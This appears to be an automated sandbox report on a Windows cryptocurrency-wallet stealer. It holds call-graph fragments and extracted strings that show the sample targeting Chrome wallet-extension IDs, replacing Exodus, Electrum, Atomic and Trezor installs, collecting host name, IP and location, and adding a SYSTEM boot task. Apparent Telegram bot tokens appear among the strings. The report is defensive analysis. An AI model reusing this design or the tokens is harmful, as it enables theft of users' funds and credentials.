calls 42436->42437 42438 7ff72c9c96fe 42437->42438 42439 7ff72c9cf4a0 50 API calls 42438->42439 42440 7ff72c9c9723 42439->42440 42441 7ff72c9cece0 50 API calls 42440->42441 42442 7ff72c9c9730 42441->42442 42443 7ff72c9cece0 50 API calls 42442->42443 42444 7ff72c9c973d 42443->42444 42445 7ff72c9cf4a0 50 API calls 42444->42445 42446 7ff72c9c9788 42445->42446 42447 7ff72c9d2960 50 API calls 42446->42447 42448 7ff72c9c97a3 42447->42448 42449 7ff72c9cf4a0 50 API calls 42448->42449 42450 7ff72c9c97b7 42449->42450 42451 7ff72c9cf4a0 50 API calls 42450->42451 42452 7ff72c9c97cb 42451->42452 42453 7ff72c9cf4a0 50 API calls 42452->42453 42454 7ff72c9c97df 42453->42454 42455 7ff72c9ceed0 50 API calls 42454->42455 42456 7ff72c9c981e 42455->42456 42457 7ff72c9cf4a0 50 API calls 42456->42457 42458 7ff72c9c9832 42457->42458 42459 7ff72c9ceed0 50 API calls 42458->42459 42460 7ff72c9c9871 42459->42460 42461 7ff72c9cece0 50 API calls 42460->42461 42462 7ff72c9c989b 42461->42462 42463 7ff72c9cf4a0 50 API calls 42462->42463 42464 7ff72c9c98da 42463->42464 42465 7ff72c9cf4a0 50 API calls 42464->42465 42466 7ff72c9c98f5 42465->42466 42467 7ff72c9cf4a0 50 API calls 42466->42467 42468 7ff72c9c9909 42467->42468 42469 7ff72c9ceed0 50 API calls 42468->42469 42470 7ff72c9c9948 42469->42470 42471 7ff72c9cf4a0 50 API calls 42470->42471 42472 7ff72c9c995c 42471->42472 42473 7ff72c9ceed0 50 API calls 42472->42473 42474 7ff72c9c999b 42473->42474 42475 7ff72c9cece0 50 API calls 42474->42475 42476 7ff72c9c99d4 42475->42476 42477 7ff72c9cf4a0 50 API calls 42476->42477 42478 7ff72c9c99e8 42477->42478 42479 7ff72c9cf4a0 50 API calls 42478->42479 42480 7ff72c9c9a0d 42479->42480 42481 7ff72c9cece0 50 API calls 42480->42481 42482 7ff72c9c9a1a 42481->42482 42483 7ff72c9cece0 50 API calls 42482->42483 42484 7ff72c9c9a27 42483->42484 42485 7ff72c9cf4a0 50 API calls 42484->42485 42486 7ff72c9c9a72 42485->42486 42487 7ff72c9d2960 50 API calls 42486->42487 42488 7ff72c9c9a8d 42487->42488 42489 7ff72c9cf4a0 50 
43507->43509 43508->43496 43508->43498 43508->43501 43508->43505 43512 7ff72c9b63e1 _Receive_impl 43509->43512 43510->43506 43512->43506 45036 7ff72c9ba810 43716->45036 44193->42838 44194->42838 44195->42838 44196->42838 44197->42838 44198->42838 44199->42838 44201 7ff72c9d0381 44200->44201 44203 7ff72c9d038a _Receive_impl 44200->44203 45412 7ff72c9d46a0 47 API calls 2 library calls 44201->45412 44203->42838 44210->42632 44217 7ff72c9c797c K32EnumProcesses 44216->44217 44217->42882 44217->42891 44220 7ff72c9d1de8 44218->44220 44224 7ff72c9d5b90 44220->44224 44221 7ff72c9d1e34 44222 7ff72c9d1160 10 API calls 44221->44222 44223 7ff72c9d1e3c 44222->44223 44223->42886 44225 7ff72c9d5bc1 44224->44225 44226 7ff72c9d5bd6 44225->44226 44227 7ff72c9d1160 10 API calls 44225->44227 44228 7ff72c9d5ca8 44226->44228 44231 7ff72c9d5cdd 44226->44231 44227->44226 44229 7ff72c9d5cb9 44228->44229 44240 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 44228->44240 44229->44221 44241 7ff72c9f49c0 RtlPcToFileHeader RaiseException 44231->44241 44233 7ff72c9d5d30 44234 7ff72c9d62f3 44233->44234 44235 7ff72c9d652f 44233->44235 44242 7ff72c9d0e30 44234->44242 44255 7ff72c9eeec4 50 API calls 2 library calls 44235->44255 44239 7ff72c9d632a std::_Locinfo::_Locinfo_ctor 44239->44221 44240->44229 44241->44233 44243 7ff72c9d0e5c 44242->44243 44254 7ff72c9d0efb _Receive_impl 44242->44254 44244 7ff72c9d0f62 44243->44244 44245 7ff72c9d0e81 44243->44245 44247 7ff72c9d0e8e 44243->44247 44248 7ff72c9d0eb7 44243->44248 44256 7ff72c9b2370 50 API calls 3 library calls 44244->44256 44252 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44245->44252 44245->44254 44247->44244 44249 7ff72c9d0e9b 44247->44249 44250 7ff72c9f2a38 std::_Facet_Register 50 API calls 44248->44250 44251 7ff72c9f2a38 std::_Facet_Register 50 API calls 44249->44251 44250->44245 44251->44245 44253 7ff72c9d0f6d 44252->44253 44254->44239 44256->44245 44257->42903 44258->42909 44259->42915 44260->42919 44262 
7ff72c9eeae4 std::_Lockit::_Lockit 6 API calls 44261->44262 44263 7ff72c9d7310 44262->44263 44264 7ff72c9eeae4 std::_Lockit::_Lockit 6 API calls 44263->44264 44270 7ff72c9d735f 44263->44270 44266 7ff72c9d7335 44264->44266 44265 7ff72c9d73ac 44267 7ff72c9eeb5c std::_Lockit::~_Lockit LeaveCriticalSection 44265->44267 44268 7ff72c9eeb5c std::_Lockit::~_Lockit LeaveCriticalSection 44266->44268 44269 7ff72c9d73f0 44267->44269 44268->44270 44271 7ff72c9f2770 codecvt 8 API calls 44269->44271 44270->44265 44290 7ff72c9b3130 87 API calls 7 library calls 44270->44290 44272 7ff72c9d22d3 44271->44272 44280 7ff72c9d5710 44272->44280 44274 7ff72c9d73be 44275 7ff72c9d7413 44274->44275 44276 7ff72c9d73c4 44274->44276 44292 7ff72c9b2bf0 50 API calls 3 library calls 44275->44292 44291 7ff72c9ef08c 50 API calls std::_Facet_Register 44276->44291 44279 7ff72c9d7418 44281 7ff72c9d5741 44280->44281 44282 7ff72c9d1160 10 API calls 44281->44282 44283 7ff72c9d5756 44281->44283 44282->44283 44285 7ff72c9d582f 44283->44285 44287 7ff72c9d5864 44283->44287 44284 7ff72c9d2313 44284->42926 44285->44284 44293 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 44285->44293 44294 7ff72c9f49c0 RtlPcToFileHeader RaiseException 44287->44294 44289 7ff72c9d58b7 44290->44274 44291->44265 44292->44279 44293->44284 44294->44289 44295->42934 44296->42930 44338 7ff72c9cee10 44297->44338 44300 7ff72c9cee10 50 API calls 44301 7ff72c9d29ef 44300->44301 44302 7ff72c9cee10 50 API calls 44301->44302 44303 7ff72c9d29fd 44302->44303 44304 7ff72c9cee10 50 API calls 44303->44304 44305 7ff72c9d2a0b 44304->44305 44306 7ff72c9cec10 50 API calls 44305->44306 44307 7ff72c9d2a19 44306->44307 44308 7ff72c9cee10 50 API calls 44307->44308 44309 7ff72c9d2a27 44308->44309 44310 7ff72c9cee10 50 API calls 44309->44310 44311 7ff72c9d2a47 44310->44311 44312 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44311->44312 44313 7ff72c9d2a5b 44312->44313 44314 7ff72c9cee10 50 API calls 44313->44314 44315 7ff72c9d2a84 
44314->44315 44316 7ff72c9cee10 50 API calls 44315->44316 44317 7ff72c9d2a95 44316->44317 44318 7ff72c9cee10 50 API calls 44317->44318 44319 7ff72c9d2aa6 44318->44319 44320 7ff72c9cee10 50 API calls 44319->44320 44321 7ff72c9d2ab7 44320->44321 44322 7ff72c9cee10 50 API calls 44321->44322 44323 7ff72c9d2acb 44322->44323 44324 7ff72c9cec10 50 API calls 44323->44324 44325 7ff72c9d2adf 44324->44325 44326 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44325->44326 44327 7ff72c9d2af3 44326->44327 44328 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44327->44328 44329 7ff72c9d2b20 44328->44329 44330 7ff72c9cec10 50 API calls 44329->44330 44331 7ff72c9d2b34 44330->44331 44332 7ff72c9cec10 50 API calls 44331->44332 44333 7ff72c9d2b48 44332->44333 44334 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44333->44334 44335 7ff72c9d2b8f 44334->44335 44336 7ff72c9cee10 50 API calls 44335->44336 44337 7ff72c9d2994 44336->44337 44337->42946 44339 7ff72c9cee4e 44338->44339 44346 7ff72c9ceea8 44338->44346 44348 7ff72c9d5e60 50 API calls 3 library calls 44339->44348 44341 7ff72c9f2770 codecvt 8 API calls 44342 7ff72c9ceebc 44341->44342 44342->44300 44343 7ff72c9cee9d 44349 7ff72c9d46a0 47 API calls 2 library calls 44343->44349 44345 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44347 7ff72c9cee53 44345->44347 44346->44341 44347->44343 44347->44345 44348->44347 44349->44346 44351->42970 44352->42991 44353->43081 44360 7ff72c9eea08 QueryPerformanceFrequency 44355->44360 44357 7ff72c9b39e2 44361 7ff72c9ee9ec QueryPerformanceCounter 44357->44361 44359 7ff72c9b39ea 44359->43124 44360->44357 44361->44359 44404 7ff72ca01824 44362->44404 44365 7ff72c9ee0c6 AreFileApisANSI 44366 7ff72c9b7cf3 44365->44366 44367 7ff72c9b3ab0 44366->44367 44368 7ff72c9b3b04 44367->44368 44369 7ff72c9b3bda 44367->44369 44381 7ff72c9b3c00 44368->44381 44414 7ff72c9ee0dc MultiByteToWideChar GetLastError 44368->44414 44369->43147 44372 7ff72c9b3b2a 44373 7ff72c9b3c06 44372->44373 44377 7ff72c9b3b45 44372->44377 
44415 7ff72c9d4730 50 API calls 6 library calls 44372->44415 44419 7ff72c9b2b80 50 API calls _com_raise_error 44373->44419 44416 7ff72c9ee0dc MultiByteToWideChar GetLastError 44377->44416 44379 7ff72c9b3bcf 44379->44369 44417 7ff72c9b2b80 50 API calls _com_raise_error 44379->44417 44418 7ff72c9b2800 50 API calls 2 library calls 44381->44418 44383 7ff72c9b4ebf 44382->44383 44387 7ff72c9b4e57 44382->44387 44385 7ff72c9ee440 66 API calls 44383->44385 44384 7ff72c9f2770 codecvt 8 API calls 44386 7ff72c9b4f6d 44384->44386 44385->44387 44386->43214 44387->44384 44394 7ff72c9b4fb0 44388->44394 44389 7ff72c9ee38c 2 API calls 44389->44394 44390 7ff72c9f2770 codecvt 8 API calls 44393 7ff72c9b5046 44390->44393 44391 7ff72c9b4fe7 44420 7ff72c9b5270 50 API calls 2 library calls 44391->44420 44392 7ff72c9b4ff4 44392->44390 44393->43214 44394->44389 44394->44391 44394->44392 44396->43214 44397->43214 44398->43169 44399->43168 44405 7ff72ca06f84 _Getctype 47 API calls 44404->44405 44406 7ff72ca0182d 44405->44406 44409 7ff72ca09788 44406->44409 44410 7ff72ca0979d 44409->44410 44411 7ff72c9ee0bd 44409->44411 44410->44411 44413 7ff72ca1348c 47 API calls 3 library calls 44410->44413 44411->44365 44411->44366 44413->44411 44414->44372 44415->44377 44416->44379 44418->44373 44420->44392 44422 7ff72c9d002a 44421->44422 44423 7ff72c9cffda 44421->44423 44422->43346 44424 7ff72c9cfdd0 78 API calls 44423->44424 44425 7ff72c9d0014 44424->44425 44426 7ff72c9f8fe0 76 API calls 44425->44426 44426->44422 44483 7ff72c9ee3ac 44427->44483 44429 7ff72c9d87f6 _Receive_impl 44429->43346 44431 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44432 7ff72c9d881b 44431->44432 44432->43346 44434 7ff72c9d7b60 44433->44434 44441 7ff72c9d78ed 44433->44441 44506 7ff72c9d62a0 50 API calls 2 library calls 44434->44506 44435 7ff72c9d7923 44439 7ff72c9f2a38 std::_Facet_Register 50 API calls 44435->44439 44437 7ff72c9d7b5b 44505 7ff72c9b2370 50 API calls 3 library calls 44437->44505 44438 7ff72c9d7b66 
44442 7ff72c9d795d 44439->44442 44441->44435 44441->44437 44441->44442 44443 7ff72c9d7970 44441->44443 44444 7ff72c9d7999 44441->44444 44442->44438 44490 7ff72c9d8ff0 44442->44490 44443->44435 44443->44437 44446 7ff72c9f2a38 std::_Facet_Register 50 API calls 44444->44446 44446->44442 44462->43346 44463->43346 44464->43346 44465->43346 44466->43346 44476->43298 44481->43336 44482->43286 44484 7ff72c9ee3b6 FindClose 44483->44484 44485 7ff72c9d87c2 44483->44485 44484->44485 44486 7ff72c9ee3c5 44484->44486 44485->44429 44485->44431 44489 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 44486->44489 44491 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44490->44491 44505->44434 44506->44438 44524->43365 44526 7ff72c9d8b22 44525->44526 44536 7ff72c9d8bae 44525->44536 44527 7ff72c9f2a38 std::_Facet_Register 50 API calls 44526->44527 44528 7ff72c9d8b3a 44527->44528 44529 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44528->44529 44530 7ff72c9d8b57 44529->44530 44531 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44530->44531 44532 7ff72c9d8b65 44531->44532 44533 7ff72c9d8af0 50 API calls 44532->44533 44534 7ff72c9d8b9c 44533->44534 44535 7ff72c9d8af0 50 API calls 44534->44535 44535->44536 44536->43370 44538 7ff72c9b56d5 44537->44538 44546 7ff72c9b56b9 _Receive_impl 44537->44546 44543 7ff72c9b570f 44538->44543 44630 7ff72c9d3b40 50 API calls 6 library calls 44538->44630 44540 7ff72c9f2770 codecvt 8 API calls 44541 7ff72c9b58c2 44540->44541 44541->43415 44542 7ff72c9cefc0 50 API calls 44544 7ff72c9b57a9 44542->44544 44543->44542 44545 7ff72c9b5856 44544->44545 44550 7ff72c9cefc0 50 API calls 44544->44550 44625 7ff72c9ee314 CreateDirectoryW 44544->44625 44545->44546 44547 7ff72c9b58db 44545->44547 44546->44540 44550->44544 44552->43393 44554 7ff72c9d05f6 44553->44554 44555 7ff72c9d06c8 44553->44555 44560 7ff72c9d0609 ctype 44554->44560 44631 7ff72c9d4c40 50 API calls 6 library calls 44554->44631 44632 7ff72c9d1520 50 API calls 44555->44632 44559 7ff72c9d06b7 
44559->43444 44560->43444 44561->43444 44563 7ff72c9d0717 44562->44563 44567 7ff72c9d06ed ctype 44562->44567 44564 7ff72c9d0819 44563->44564 44565 7ff72c9d072a 44563->44565 44633 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 44564->44633 44571 7ff72c9d0771 44565->44571 44572 7ff72c9d07ad 44565->44572 44574 7ff72c9d077e 44565->44574 44578 7ff72c9d0763 ctype 44565->44578 44567->43444 44568 7ff72c9d081e 44634 7ff72c9b2370 50 API calls 3 library calls 44568->44634 44569 7ff72c9f2a38 std::_Facet_Register 50 API calls 44569->44578 44571->44568 44571->44574 44573 7ff72c9f2a38 std::_Facet_Register 50 API calls 44572->44573 44573->44578 44574->44569 44575 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44576 7ff72c9d082a 44575->44576 44577 7ff72c9d07fb _Receive_impl 44577->43444 44578->44575 44578->44577 44579->43444 44581 7ff72c9ee770 __std_fs_open_handle 2 API calls 44580->44581 44582 7ff72c9ee80d 44581->44582 44583 7ff72c9ee813 44582->44583 44585 7ff72c9ee9bb 44582->44585 44587 7ff72c9ee770 __std_fs_open_handle 2 API calls 44582->44587 44584 7ff72c9ee816 SetFileInformationByHandle 44583->44584 44592 7ff72c9ee83c 44583->44592 44586 7ff72c9ee8b8 GetLastError 44584->44586 44584->44592 44637 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 44585->44637 44588 7ff72c9ee8c5 44586->44588 44587->44583 44588->44592 44635 7ff72c9ee03c SetFileInformationByHandle GetLastError SetFileInformationByHandle GetLastError 44588->44635 44589 7ff72c9ee892 44594 7ff72c9f2770 codecvt 8 API calls 44589->44594 44590 7ff72c9ee849 44593 7ff72c9ee884 CloseHandle 44590->44593 44592->44589 44592->44590 44592->44593 44593->44585 44593->44589 44597 7ff72c9ee8a2 44594->44597 44596 7ff72c9ee8e3 44596->44592 44599 7ff72c9ee8f5 GetFileInformationByHandleEx 44596->44599 44597->43444 44616->43418 44617->43450 44626 7ff72c9ee339 GetLastError 44625->44626 44629 7ff72c9ee32d 44625->44629 44626->44629 44629->44544 44630->44543 44631->44559 44634->44578 44635->44596 44639->43475 45037 
7ff72c9ba870 45036->45037 45038 7ff72c9ee0b4 __std_fs_code_page 48 API calls 45037->45038 45039 7ff72c9ba888 45038->45039 45040 7ff72c9b3ab0 52 API calls 45039->45040 45041 7ff72c9ba8ad 45040->45041 45042 7ff72c9bac76 45041->45042 45043 7ff72c9ba8db 45041->45043 45096 7ff72c9b4d50 51 API calls _com_raise_error 45042->45096 45045 7ff72c9bac89 45043->45045 45063 7ff72c9ba918 _Receive_impl 45043->45063 45047 7ff72c9bac8f 45048 7ff72c9b55a0 66 API calls 45048->45063 45050 7ff72c9bac9f 45051 7ff72c9babb5 45054 7ff72c9b4f80 52 API calls 45054->45063 45056 7ff72c9baca5 45057 7ff72c9bacab 45060 7ff72c9d4160 50 API calls 45060->45063 45063->45047 45063->45048 45063->45050 45063->45051 45063->45054 45063->45056 45063->45057 45063->45060 45078 7ff72c9b3f60 45063->45078 45095 7ff72c9d7d80 50 API calls 4 library calls 45063->45095 45095->45063 45412->44203
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
• Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
                                                                                                                                                                  • String ID: terminated successfully.$*L\(&.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$</b>$</code>$<all_urls>$<b>Device Name:</b> $<b>IP Address:</b> $<b>Location:</b> $<b>Wallets:</b><code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media 
Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
• API String ID: 955434303-347371858
• Opcode ID: 59db4ebdd99e30fb6ab73c31ec0bbca1e15ee0fee2104dd16a692ed7901d931a
• Instruction ID: 4f9c03259b6944b3f85e7f524b251793a483601c474a345d1ad9b976b89b6684
• Opcode Fuzzy Hash: 59db4ebdd99e30fb6ab73c31ec0bbca1e15ee0fee2104dd16a692ed7901d931a
• Instruction Fuzzy Hash: 1973A622914BC295E730EF34DC553EC6365FBA93A8F805232D68C4AA9ADF78D784C750
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
• Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
                                                                                                                                                                  • String ID: Directory: $ $ (User: $ (User: None)$#$*L\(&.$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
• API String ID: 1414602396-1188282579
• Opcode ID: 5ba4532989bbdce573cf3cd4f012c2a2fefbf00a746ed2066879ac80b5424339
• Instruction ID: 46b7d2ebdbcae1ba9a84a396573c98215ecbcdc3a0c6bd594892dfda4488a4f9
• Opcode Fuzzy Hash: 5ba4532989bbdce573cf3cd4f012c2a2fefbf00a746ed2066879ac80b5424339
• Instruction Fuzzy Hash: 1FE26562A1CBC591EA20EB14E8443AEF365FB957A4F905731D6EC02AD9DF7CE084DB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
• Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
Similarity
• API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
                                                                                                                                                                  • String ID: *L\(&.$Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
                                                                                                                                                                  • API String ID: 1778526238-2270288801
                                                                                                                                                                  • Opcode ID: e7f679fec1e2fe71e2bb3b6d2010b159ced2c01edf8d9922db579376c07f1f16
                                                                                                                                                                  • Instruction ID: 5f90a1cc166c3bda64a5bb972569a09f842fc6af373acae5c5bdc7d7c5148726
                                                                                                                                                                  • Opcode Fuzzy Hash: e7f679fec1e2fe71e2bb3b6d2010b159ced2c01edf8d9922db579376c07f1f16
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE27972A18BC541EE209B25E8447AEA361FB997B4F504331DAAD03BD9DF7DE180DB10
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                  • String ID: $*L\(&.$C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
                                                                                                                                                                  • API String ID: 1036029176-3331508475
                                                                                                                                                                  • Opcode ID: 7a4e3aa349c9cb98ba2aa56b9b9c7b2504b712bcc718a604fd593dc9a1f2a42e
                                                                                                                                                                  • Instruction ID: b2f8d75f6528cc4c61743aa4de028a677224b534035f7c467adebf197866ed47
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4e3aa349c9cb98ba2aa56b9b9c7b2504b712bcc718a604fd593dc9a1f2a42e
                                                                                                                                                                  • Instruction Fuzzy Hash: 45238062A1CBC292EA21EB14E8543EEE365FBA5760F845132D6CD07A99DF3CE540CF50
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API String ID: 4261731725-2192707863
                                                                                                                                                                  • Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                  • Instruction ID: 44aaaf61fd29ee783f622c72296d7c892e27b817e5080d584fa7b45fb4f3ba3d
                                                                                                                                                                  • Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                  • Instruction Fuzzy Hash: 63D2A122F18F4185FB00EB74E9403AC6361EB657A8F809631DEAC176DADF78E185D790
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_code_page
                                                                                                                                                                  • String ID: "$*L\(&.$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 1686256323-90473547
